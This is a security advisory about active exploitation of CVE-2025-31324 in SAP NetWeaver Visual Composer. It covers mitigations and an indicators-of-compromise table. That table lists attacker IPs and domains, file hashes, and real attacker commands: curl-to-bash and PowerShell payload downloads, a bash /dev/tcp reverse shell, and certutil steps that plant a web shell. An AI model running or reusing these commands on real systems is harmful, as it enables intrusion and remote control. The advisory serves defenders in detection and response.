- Home
- Alerts & Advisories
- Alerts
- Active Exploitation of SAP's NetWeaver Visual Composer Metadata Uploader
Active Exploitation of SAP's NetWeaver Visual Composer Metadata Uploader
13 May 2025
SAP has released an out-of-band security update to address a critical vulnerability in its NetWeaver Visual Composer Metadata Uploader product. Users and administrators of the affected product are advised to update to the latest version immediately.
Update on 8 May 2025
An open-source tool developed by Onapsis and Mandiant to help SAP customers identify potential compromise related to CVE-2025-31324 is available here: https://github.com/Onapsis/Onapsis-Mandiant-CVE-2025-31324-Vuln-Compromise-Assessment
SAP has released an out-of-band security update to address a critical vulnerability in their NetWeaver Visual Composer Metadata Uploader product (CVE-2025-31324). The vulnerability has a Common Vulnerability Scoring System (CVSSv3.1) score of 10 out of 10 and is reportedly being actively exploited.
Successful exploitation of the vulnerability could allow unauthenticated attacker to upload malicious executable files, potentially leading to remote code execution (RCE).
The vulnerability affects the Visual Composer Framework 7.50. To check if you are vulnerable, you can test if the following URL is accessible without authentication: https://[your-sap-server]/developmentserver/metadatauploader. If you can access this page without being prompted for your credentials, your system may be vulnerable.
Users and administrators of the affected product version are advised to update to the latest version immediately. If unable to do so, users and administrators are advised to perform the following mitigations:
Restrict access to the /developmentserver/metadatauploader endpoint.
If Visual Composer is not in use, consider turning it off entirely.
Forward logs to SIEM and scan for unauthorized files in the servlet path.
Indicators of compromise
Indicator | Data | Note |
IPv4 address | 205.169.39[.]55 | Tested exploit in January 2025 |
IPv4 address | 206.188.197[.]52 | Exploited vulnerability and deployed web shells in March 2025 |
IPv4 address | 65.49.235[.]210 | Hosting suspicious payload |
IPv4 address | 108.171.195[.]163 | Hosting suspicious payload |
IPv4 address | 47.97.42[.]177 | GOREVERSE C2 |
IPv4 address | 45.76.93[.]60 | Reverse SSH SOCKS proxy C2 |
IPv4 address | 158.247.224[.]100 | Hosting suspicious payload |
IPv4 address | 31.192.107[.]157 | Hosting suspicious payload |
IPv4 address | 107.173.135[.]116 | Attempted GET requests against several already reported web shell names |
IPv4 address | 192.3.153[.]18 | Attempted GET requests against several already reported web shell names to download reported Supershell malware from the domain overseas-recognized-athens-oakland[.]trycloudflare |
IPv4 address | 188.166.87[.]88 | Attempted GET requests against several already reported web shell names |
IPv4 address | 223.184.254[.]150 | Attempted GET requests against several already reported web shell names |
IPv4 address | 51.79.66[.]183 | Attempted GET requests against several already reported web shell names |
IPv4 address | 85.106.113[.]168 | Attempted GET requests against the helper.jsp web shell to download and execute a bash command from 138.68.61[.]82 |
IPv4 address | 138.68.61[.]82 | Reverse shell C2 |
IPv4 address | 101.99.91[.]107 | Attempted GET requests against several already reported web shell names |
IPv4 address | 103.207.14[.]195 | Attempted GET requests against several already reported web shell names |
IPv4 address | 13.232.191[.]219 | Attempted GET requests against several already reported web shell names |
FQDN | ocr-freespace.oss-cn-beijing.aliyuncs[.]com | Hosted GOREVERSE payload |
FQDN | overseas-recognized-athens-oakland.trycloudflare[.]com | Hosted reported SUPERSHELL payload |
FQDN | d-69b.pages[.]dev | Hosting suspicious payload |
Command | curl 138.68.61[.]82|bash | Downloads and executes this command bash -i >& /dev/tcp/138.68.61[.]82/4544 0>&1 |
Command | bash -i >& /dev/tcp/138.68.61[.]82/4544 0>&1 | Establishes reverse shell from a compromised SAP server |
Command | curl -sk hxxps://overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js || wget --no-check-certificate -q -O - hxxps://overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js) | bash -sh | Attempted to download reported SUPERSHELL payload |
Command | powershell Invoke-WebRequest -Uri "hxxp://31.192.107[.]157:38205/ReportQueue.exe" -OutFile "C:\programdata\ReportQueue.exe" | Attempting to download a suspicious payload |
Command | powershell Invoke-WebRequest -Uri "hxxp://158.247.224[.]100:38205/EACA38DB.tmp" -OutFile "C:\programdata\EACA38DB.tmp" | Attempting to download a suspicious payload |
Command | powershell curl -o "C:\users\public\ansgdhs.bat" hxxp://101.32.26[.]154/rymhNszS/ansgdhs.bat | Attempting to download a malicious Batch file |
Command | powershell IEX(New-Object Net.WebClient).DownloadString('hxxps://d-69b.pages[.]dev/sshb64.ps1') | Attempting to download a malicious PowerShell script |
Command | certutil.exe -urlcache -split -f hxxp://108.171.195[.]163:8000/$FILE_NAME$.txt ~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp | Attempting to download suspicious payload |
Command | powershell (new-object Net.WebClient).DownloadFile('hxxp://108.171.195[.]163:8000/$FILE_NAME$.txt ,'~\sap.com\irj\servlet_jsp\irj\root\Logout.jsp') | Attempting to download suspicious payload |
Command | powershell Invoke-WebRequest -Uri "hxxp://65.49.235[.]210/download/2.jpg" -OutFile "cmake.exe" | Attempting to download unknown payload |
SHA256 hash | df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049 | Downloaded from 101.32.26[.]15 named shell.jsp |
SHA256 hash | 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d | Downloaded by ansgdhs.bat named 0g9pglZr74.ini. This suspicious file is downloaded from 101.32.26[.]15. |
SHA256 hash | c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28 | Downloaded by ansgdhs.bat named wbemcomn.dll this suspicious file is downloaded from 101.32.26[.]154 and is possibly side-loaded |
SHA256 hash | 3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5 | Batch file downloaded from 101.32.26[.]154 named ansgdhs.bat |
SHA256 hash | 598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0 | JSP webshell named helper.jsp and usage.jsp |
SHA256 hash | 888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef | GOREVERSE reverse shell, named config |
SHA256 hash | 5919F2EAB8A826D7BA84E6C413626F5D11ED412D7DF0D3AB864F31D3A8DB3763 | Batch script that attempts to download GOREVERSE and executes it |
SHA256 hash | 5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e | Payload downloaded from 65.49.235[.]210 named 2.jpg |
SHA256 hash | 427877aadd89f427e1815007998d9bb88309c548951a92a6e4064df001e327c2 | Base64-encoded PowerShell Script downloaded from d-69b.pages[.]dev named sshb64.ps1 that creates reverse SSH SOCKS proxy |
SHA256 hash | 69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75 | JSP web shell named ran.jsp |
SHA256 hash | b9ef95ca541d3e05a6285411005f5fee15495251041f78e715234b09d019b92c | Suspected web shell |
SHA256 hash | 1abf922a8228fd439a72cfddf1ed08ea09b59eaa4ae5eeba1d322d5f3e3c97e8 | Suspected web shell |
SHA256 hash | 2e6f348f8296f4e062c397d2f3708ca6fdeab2c71edfd130b2ca4c935e53c0d3 | Suspected web shell |
SHA256 hash | 6c6c984727dc53af110ed08ec8b15092facb924c8ad62e86ec76b52a00a41a40 | Suspected web shell |
SHA256 hash | 4b17beee8c2d94cf8e40efc100651d70d046f5c14a027cf97d845dc839e423f9 | Suspected web shell |
SHA256 hash | 7aab6ec707988ff3eec37f670b6bb0e0ddd02cc0093ead78eb714abded4d4a79 | Suspected web shell |
SHA256 hash | b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee | Suspected web shell |
More information is available here:
https://me.sap.com/notes/3594142
https://nvd.nist.gov/vuln/detail/CVE-2025-31324
https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/